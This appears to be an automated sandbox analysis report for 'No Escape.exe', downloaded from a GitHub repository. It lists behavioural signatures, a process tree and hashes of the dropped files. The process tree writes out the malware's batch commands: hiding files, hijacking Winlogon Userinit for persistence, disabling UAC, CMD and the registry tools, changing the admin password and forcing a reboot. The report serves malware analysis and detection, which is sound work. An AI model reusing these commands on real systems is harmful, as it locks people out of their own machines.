Analysis

  • max time kernel
    53s
  • max time network
    54s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/11/2024, 01:16

Errors

Reason
Machine shutdown

General

  • Target

    https://github.com/LocalAlloc/NO-ESCAPE

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Downloads MZ/PE file
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 25 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • NTFS ADS 1 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/LocalAlloc/NO-ESCAPE
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3800
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa99af46f8,0x7ffa99af4708,0x7ffa99af4718
      2⤵
        PID:2228
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        2⤵
          PID:868
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1928
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
          2⤵
            PID:3040
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
            2⤵
              PID:2504
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
              2⤵
                PID:5052
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
                2⤵
                  PID:4672
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3840
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5408 /prefetch:8
                  2⤵
                    PID:756
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
                    2⤵
                      PID:3204
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
                      2⤵
                        PID:4876
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1
                        2⤵
                          PID:4864
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3368 /prefetch:8
                          2⤵
                            PID:704
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
                            2⤵
                              PID:4196
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
                              2⤵
                                PID:968
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
                                2⤵
                                  PID:5340
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,1257053727150358908,3388657059978894113,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3316 /prefetch:8
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:5500
                                • C:\Users\Admin\Downloads\No Escape.exe
                                  "C:\Users\Admin\Downloads\No Escape.exe"
                                  2⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5620
                                  • C:\Windows\SysWOW64\wscript.exe
                                    "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\4B4C.tmp\4B4D.tmp\4B4E.vbs //Nologo
                                    3⤵
                                    • Checks computer location settings
                                    • System Location Discovery: System Language Discovery
                                    PID:5964
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\hello.bat" "
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:6112
                                      • C:\Windows\SysWOW64\attrib.exe
                                        attrib +s +h C:\msg.exe
                                        5⤵
                                        • Sets file to hidden
                                        • System Location Discovery: System Language Discovery
                                        • Views/modifies file attributes
                                        PID:4024
                                      • C:\Windows\SysWOW64\attrib.exe
                                        attrib +s +h C:\launch.exe
                                        5⤵
                                        • Sets file to hidden
                                        • System Location Discovery: System Language Discovery
                                        • Views/modifies file attributes
                                        PID:716
                                      • C:\Windows\SysWOW64\regedit.exe
                                        regedit /s hello.reg
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Runs .reg file with regedit
                                        PID:4148
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System /v DisableLogonBackgroundImage /t REG_DWORD /d 1
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3212
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\Windows\system32\userinit.exe,C:\launch.exe /f
                                        5⤵
                                        • Modifies WinLogon for persistence
                                        • System Location Discovery: System Language Discovery
                                        PID:5176
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add "HKEY_CURRENT_USER\control panel\desktop" /v wallpaper /t REG_SZ /d C:\hello.jpg /f
                                        5⤵
                                        • Sets desktop wallpaper using registry
                                        • System Location Discovery: System Language Discovery
                                        PID:4672
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3400
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                        5⤵
                                        • UAC bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:4164
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:464
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                        5⤵
                                        • Disables RegEdit via registry modification
                                        • System Location Discovery: System Language Discovery
                                        • Modifies registry key
                                        PID:2280
                                      • C:\Windows\SysWOW64\net.exe
                                        net user Admin death
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1976
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 user Admin death
                                          6⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4840
                                      • C:\Windows\SysWOW64\shutdown.exe
                                        shutdown /t 0 /r
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1476
                                • C:\Users\Admin\Downloads\No Escape.exe
                                  "C:\Users\Admin\Downloads\No Escape.exe"
                                  2⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5728
                                  • C:\Windows\system32\wscript.exe
                                    "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\4B4D.tmp\4B4D.tmp\4B4E.vbs //Nologo
                                    3⤵
                                      PID:5972
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:3464
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:3244
                                    • C:\Windows\system32\LogonUI.exe
                                      "LogonUI.exe" /flags:0x4 /state0:0xa3900055 /state1:0x41c64e6d
                                      1⤵
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5200

                                    Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Program Files (x86)\date.txt

                                            Filesize

                                            120B

                                            MD5

                                            255a8e245b6ad378558b90cbe3dbc3d0

                                            SHA1

                                            6eb73f9f2034c113a2a6b1aab9a440a21928cfc2

                                            SHA256

                                            d3195bde888f9b8a71f2eb840222f1586b652d0ede9f39841a180ead03633ca9

                                            SHA512

                                            67e03d7bffa0dec32535b6da46d5b7f38d94a7c9a231aa2fa625b81485d41c1ecac95b08fe5b7a605fcfe1c7e37c55ee716c9045df90ea6e030b86e52ec09edf

                                          • C:\Program Files (x86)\hello.bat

                                            Filesize

                                            1KB

                                            MD5

                                            b86fddd2b764f079615be5d4dc3e158d

                                            SHA1

                                            2510479054db1fe52cc2dcd3c7033d91204cb367

                                            SHA256

                                            2b2114784d15b0b0d5475256851b4d0d4da7181198c2a93a304ecedb98eaf091

                                            SHA512

                                            915363bc9f6e665358c8d25f5f5f51d64c53cb755be999013217162b126705ce641ea809047bc84511db7e3e383b848ec3932924baa8926d51a51d0037a5ca63

                                          • C:\Program Files (x86)\hello.jpg

                                            Filesize

                                            110KB

                                            MD5

                                            057ea45c364eb2994808a47b118556a2

                                            SHA1

                                            1d48c9c15ea5548af1475b5a369a4f7b8db42858

                                            SHA256

                                            6e1115188aa00fb5ff031899100bacb0d34819707e069bca3eb53935ebb39836

                                            SHA512

                                            582c7ecf2d0c33c8706ff3f39aa926780aa8f0dc0ff5d563905a5100254b81b89def22206abee0871ab339a3d463de9e6ec1782d92198e8f386f173654b6e760

                                          • C:\Program Files (x86)\hello.reg

                                            Filesize

                                            3KB

                                            MD5

                                            81427e9d5d10657b9edffd22e7b405bb

                                            SHA1

                                            f27ab62f77f827dbb32c66a35ac48006c47f4374

                                            SHA256

                                            bb21001c1c468e6e372d836952c3efb7fbdc98e9a20a1bfdcc4beb1b7a1e7f83

                                            SHA512

                                            b0ee65bcef13be7c17db6e06b96cd44774fcebe6f4a411b0073493ff53f795e3b7c49e921c3bd2e41256638bc161f5218d1c51b589c3e10164f8f2c0d1db1592

                                          • C:\Program Files (x86)\launch.exe

                                            Filesize

                                            92KB

                                            MD5

                                            b4acc41d0e55b299ffeec11a8a20cf08

                                            SHA1

                                            bbee20882bdd9dcd24b54b6af6c48cf5efc8c6fa

                                            SHA256

                                            34bc0d5b6029a74b9cda56b72434ec1b55b6742ff5ef832d36027a987a63cd42

                                            SHA512

                                            d4fa9900d703ea12d508929718433f97581a23b63458e5070ff7749871a7f60889db45098ec2972687b864ba97ab4fc307e8c80c4450dee79c0a5738818d2794

                                          • C:\Program Files (x86)\msg.exe

                                            Filesize

                                            9KB

                                            MD5

                                            331a0667b11e02330357565427dc1175

                                            SHA1

                                            d84c1ae0bf2c8ca1f433f0086ca86e07f61204c2

                                            SHA256

                                            fc7174e44a1d34040c3bc05ce24e648742a38a3accce22e8300d7059e4d12431

                                            SHA512

                                            1c47f0438dce58d473d93c10f233650df3e86d7e762a08b3a933da37683e76a079d275db4a1b4028d903f7e43f487173ba8bb25c4cff6f3e1161d0a5b2b18cec

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                            Filesize

                                            152B

                                            MD5

                                            b8880802fc2bb880a7a869faa01315b0

                                            SHA1

                                            51d1a3fa2c272f094515675d82150bfce08ee8d3

                                            SHA256

                                            467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812

                                            SHA512

                                            e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                            Filesize

                                            152B

                                            MD5

                                            ba6ef346187b40694d493da98d5da979

                                            SHA1

                                            643c15bec043f8673943885199bb06cd1652ee37

                                            SHA256

                                            d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

                                            SHA512

                                            2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                            Filesize

                                            2KB

                                            MD5

                                            f31b5b658fa6e9986dc2a400514347d0

                                            SHA1

                                            73e6b96d7838af53f7c68b6a90b9e44ca9ce6bdf

                                            SHA256

                                            a16ea0ac854ac8c5d4f9f3601e626407fd48d703da579fd371bed16699f07960

                                            SHA512

                                            22693530731ef40d118fe20d645a5ad9155bdd6526b5f68c61647c66faecfd032189490aa4f56da036cab29ceac76fb33e3f5a11052dbd8282368dec255318b9

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                            Filesize

                                            5KB

                                            MD5

                                            26b2d087f718f7aead380e8448c6af54

                                            SHA1

                                            4ad1fce6451c3c1576e367662eb02ae5fd7950b7

                                            SHA256

                                            9e438465f547a3c13ca9ecc123953058ca7362092b1279d3ce7a7f6d99b2e5ef

                                            SHA512

                                            786debdb01751caeb5d3ea6040905f1a1a34d8d301642d3e13bae6e8e5b6d5c82681f46e35dc0f57dcb45b881cf232893ee47169909de6e2b6ee42248275fd8c

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                            Filesize

                                            6KB

                                            MD5

                                            a01dc4ce7c3c25ebc32d860166fc69a4

                                            SHA1

                                            3f553c671fb7401460a041e1f7020f501575ab31

                                            SHA256

                                            63c220d42d0abf4499d1ae39e8f93b0418d15437644eef79e342c3024a5fc119

                                            SHA512

                                            be9b9f83e2377269ec2d27d39612cdde0ba98575407c4e0a19a1df9cea2946693fb629ac627552beab62e2a4bfd63614bef8efeb9a787c5de14d0ca24c482c3f

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                            Filesize

                                            6KB

                                            MD5

                                            1b77c25cea49b772e7a71d1b59e3e8e4

                                            SHA1

                                            9857cba5716d9a66784519f242a8403a2b9c4c18

                                            SHA256

                                            7177a3c7322e1c7f87e4f053800990bfe72b8d37bf90e1a1c7569f3315d6d967

                                            SHA512

                                            35838289014ca60c0341933f72b669c518d532488aad498e5ab9154b258feb119b68521af316ee8be9812d958f6c5b726fc89f8edfce17649290626e5c0162ab

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                            Filesize

                                            1KB

                                            MD5

                                            2f7520878aaf2e9eeef99f5163b11ff3

                                            SHA1

                                            7c253ab46b8d5480bc1369b535c7240e3965afe0

                                            SHA256

                                            14f1fe7a3b000f4463298157880bd50da0b74308e2aa9df6a5ac9629af40d0f2

                                            SHA512

                                            f725a5769236eb109c374369723dbcdb4521f3928701c436fb1efb35aedb46919fba1399b57ad02739d29650f1d5aea2fddf9c3f46ddccfa0fad7b92ba67a44b

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57fc80.TMP

                                            Filesize

                                            874B

                                            MD5

                                            63f17f20e9922429df3df02d46bbdb40

                                            SHA1

                                            08b702c1207c1d706d69b8386c8e616fff30e3fa

                                            SHA256

                                            34f101d5035d2abf1e02423ecb866e8719fafd7fbf940d001943e546f23d57c8

                                            SHA512

                                            ed9bb7db9626e0604f36718a60722ad9ce860cb8f6b2bdfec844dba060b0cb1e247cbcae407865829604f03344bf6140fe7893e4b407ed6a8b019f141ab021eb

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\d8a82a06-2560-42ba-a927-ec4c4b21fed1.tmp

                                            Filesize

                                            874B

                                            MD5

                                            0e97d973b820863b3967f8e1696bd8dd

                                            SHA1

                                            4a298f8e875ad07f0a549da8951857db48b1980b

                                            SHA256

                                            25072eb41f14268775cc3308fa3de9af0fdd9f6a2e02dfad132f9134000b6635

                                            SHA512

                                            2c388ee246b95ef48b9300daec471b4f7095a36f76e85f93a184a34618acafe8d196cbe577ab6d955a270ce653642d807bd541466f1bb4eab20e55065408e5fe

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                            Filesize

                                            16B

                                            MD5

                                            6752a1d65b201c13b62ea44016eb221f

                                            SHA1

                                            58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                            SHA256

                                            0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                            SHA512

                                            9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                            Filesize

                                            11KB

                                            MD5

                                            a3fc8c08fe242005d89190660382c122

                                            SHA1

                                            bde5065ff57451300e0c459f1b1a1f219db03dff

                                            SHA256

                                            5d63b8b30e14e706b9e00a93bb3b520995ed998f4ebc684cd836c6c7fcb9ba58

                                            SHA512

                                            838577c2bd404f377a0d96be195da0378269cb098815a80f0c792510503208417d3c867090082818c3a30625e5a7e916fb9969fa11a0d39f464dee269a32a579

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                            Filesize

                                            11KB

                                            MD5

                                            a83268062c318d4a6ce4876fd357f7ca

                                            SHA1

                                            cf2e461bd94c388537ecdf9bb29b916834e5cd70

                                            SHA256

                                            e79fac0fc851e6eb9ab009854cba74e8697afa7bc18303466c8ec1b8a2fc3a8e

                                            SHA512

                                            2956dbc00d1994b4c9686613f22e39cb63ee44e5c663ef78e62b21330f0710504f827672d22e20d1cf152a1eb15ce5236f04561d407dfbb77826ab8ae0b7fb34

                                          • C:\Users\Admin\AppData\Local\Temp\4B4D.tmp\4B4D.tmp\4B4E.vbs

                                            Filesize

                                            588B

                                            MD5

                                            67706bca9ceaba11530e05d351487003

                                            SHA1

                                            3a5ed77f81b14093a5f18c4d46895bc7ea770fee

                                            SHA256

                                            190a0d994512ed000cf74bd40fb0502988c2ac48855b23a73fd905c0305fc30f

                                            SHA512

                                            902ac91678d85801a779acbc212c75beba72f8da996b0ed1b148a326c2dd635b88210f9a503fbbffa5271335483eae972e6a00acbc01ec013cf355c080444598

                                          • C:\Users\Admin\Downloads\Unconfirmed 588643.crdownload

                                            Filesize

                                            771KB

                                            MD5

                                            2782877418b44509fd306fd9afe43e39

                                            SHA1

                                            b0c18bdf782ca9c4fa41074f05458ce8e0f3961b

                                            SHA256

                                            56d612e014504c96bb92429c31eb93f40938015d422b35765912ac4e6bd3755b

                                            SHA512

                                            8826881b3ab406ee4c1fabd4848161f8524aeaeb7c4397384d36840f947ef95c8560850b2409fbf761ff225cdc8ac6eb875b705476fe9574b23c7a5478505a86